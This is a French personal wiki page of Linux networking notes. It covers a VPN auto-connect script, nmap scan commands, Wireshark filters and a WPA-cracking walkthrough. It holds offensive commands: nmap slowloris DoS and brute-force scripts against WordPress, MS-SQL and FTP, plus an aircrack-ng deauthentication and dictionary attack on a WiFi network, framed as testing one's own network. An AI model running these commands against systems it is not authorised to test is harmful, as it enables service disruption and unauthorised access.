Outils pour utilisateurs

Outils du site


Action disabled: register
linux:network

NetworkManager

Connecter le VPN automatiquement

Pour se faire, il suffit d'ajouter le script ci-dessous à l'emplacement indiqué :

  • /etc/NetworkManager/dispatcher.d/vpn-up
    #! /bin/bash
     
    REQUIRED_CONNECTION_NAME="<name-of-connection>"
    VPN_CONNECTION_NAME="<name-of-vpn-connection>"
     
     
    default_conn=$(nmcli con show --active | grep "${REQUIRED_CONNECTION_NAME}")
    vpn_conn=$(nmcli con show id | grep "${VPN_CONNECTION_NAME}")
    if [ "${default_conn}" -a ! "${vpn_conn}" ];
    then
        nmcli con up id "${VPN_CONNECTION_NAME}"
    fi

Il faut ensuite simplement adapter les variables REQUIRED_CONNECTION_NAME et VPN_CONNECTION_NAME, et le tour est joué. Un redémarrage du service NetworkManager, ou un reboot de la machine est nécessaire.

ATTENTION !! ne pas oublier de le rendre exécutable !!

source

Nmap

Dans tous les cas, on peut scanner soit un poste avec son ip, soit un réseau avec la forme 192.168.0.0/24.

Scan

Pour toutes les commandes ci-dessous on peut aussi faire un export en xml (converti ensuite en html) via la commande suivante :

nmap -sn 192.168.1.0/24 -oX test.xml; xsltproc test.xml -o test.html

Lister les hosts en ligne

nmap -sn 192.168.1.0/24

Scanne toutes les IP en 192.168.1.*

Afficher l'OS (root)

sudo nmap -O 192.168.1.51

Scan détaillé

nmap -A -T4 192.168.1.13

On ajoute -T4 pour une détection plus rapide (4 Threads)

Ports spécifiques (root)

On peut spécifier un port spécifique avec -p [port]. Sans précision supplémentaire, le port sera scanner sur tous les types de protocole (TCP/UDP/SCTP/IP). On peut sinon spécifier avec les options T: pour TCP, U: pour UDP, S: pour SCTP, ou P: pour IP. On peut aussi les utiliser simultanément, comme ceci :

nmap 192.168.1.0/24 -p U:53,111,137,T:21-25,80,139,8080

Scanner sans résolution DNS (gain de temps)

Ajouter le commutateur -n

Détecter les services et leur version

nmap -sV 192.168.1.0/24

Scanner les ports TCP

nmap -sT 192.168.1.0/24

Scanner les ports UDP (root)

sudo nmap -sU 192.168.1.0/24

Techniques

Détection des CVE/vuln

nmap -Pn --script vuln 192.168.1.1

DOS (non-root)

nmap 192.168.1.1 -max-parallelism 800 -Pn --script http-slowloris --script-args http-slowloris.runforever=true

Brute Force

WordPress

nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com, http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.1.105

MS-SQL

nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 192.168.1.105

FTP

nmap --script ftp-brute -p 21 192.168.1.105

Check malwares

Script standard

nmap -sV --script=http-malware-host 192.168.1.105

Script Google

nmap -p80 --script http-google-malware infectedsite.com

source

Wireshark

Filtres

Expressions

==
!=
<=
>=
<
>

Opérateurs

AND
(ip.src==192.168.2.25) && (ip.dst==74.125.236.16)
OR
(ip.src==192.168.2.25)||(ip.dst==192.168.2.25)

Filtres

IP Sourceip.src == 192.168.1.10
IP Destinationip.dst == 192.168.1.1
IP (les deux)ip.addr == 192.168.1.10

IP / Hostnames / DNS

Hostname à partir de l'IP

getent hosts IP

Cela fonctionne aussi bien en LAN que sur des hosts distants.

WIFI

Observer le traffic

Créer une interface moniteur

sudo iw phy phy0 interface add mon0 type monitor

Lister les SSID

airodump-ng mon0

Supprimer une interface moniteur

sudo iw mon0 del

Tester la sécurité d'un réseau

Attention, ceci est à réaliser uniquement sur votre propre réseau, il est strictement interdit par la loi de le faire sur le réseau de quelqu'un d'autre sans son accord préalable et écrit. Vous êtes responsables de vos actes.

Nous utiliserons la populaire suite aircrack.

Le test de sécurité se déroule en 4 étapes principales : créer l'interface moniteur, cibler le réseau, récupérer le “handshake”, trouver le mot de passe.

Créer l'interface moniteur

sudo airmon-ng # lister les cartes réseau
sudo airmon-ng start wlp3s0 # lancer l'interface moniteur sur la carte wlp3s0 -> wlp3s0mon

Cibler le réseau

sudo airodump-ng wlp3s0mon # Lister les points d'accès pour en choisir un
sudo airodump-ng --write mon_reseau --bssid 00:11:22:AA:BB:CC -c 1 wlp3s0mon

–write spécifie le fichier pour les données récupérées –bssid spécifie l'adresse mac du réseau cible -c pour spécifier le canal du réseau cible

Récupérer le handshake

Dans un autre terminal, une autre fenêtre ou un autre onglet, saisir ceci pour récupérer le handshake. L'information apparaitra dans le airodump lancé précédemment. Cela peut prendre du temps, 10 secondes comme 15min…

sudo aireplay-ng -0 1 -e mon_reseau -a 00:11:22:AA:BB:CC -h 55:66:77:DD:EE:FF wlp3s0

-0 spécifie le type d'attaque (1 pour la des-authentification) -e spécifie le nom du réseau -a l'adresse mac du réseau -h l'adresse mac de la carte réseau utilisée

Trouver le mot de passe

Pour se faire, nous devons utiliser un dictionnaire. Saisir la commande suivante :

sudo aircrack-ng -a 2 -w /dossier/mon_dico.txt ./mon_reseau.cap

-a type d'attaque (2 pour WPA) -w chemin du dico (wordlist) ./mon_reseau.cap fichier de capture généré par airodump-ng

Cette dernière opération peut prendre des heures, selon la taille du dictionnaire (puisqu'il s'agit d'un brute-force).

Amusez vous bien, et faites pas de bétises ;)

Source https://www.kali-linux.fr/wifi/cracker-cle-wpa

linux/network.txt · Dernière modification : 2024/01/05 05:30 de 127.0.0.1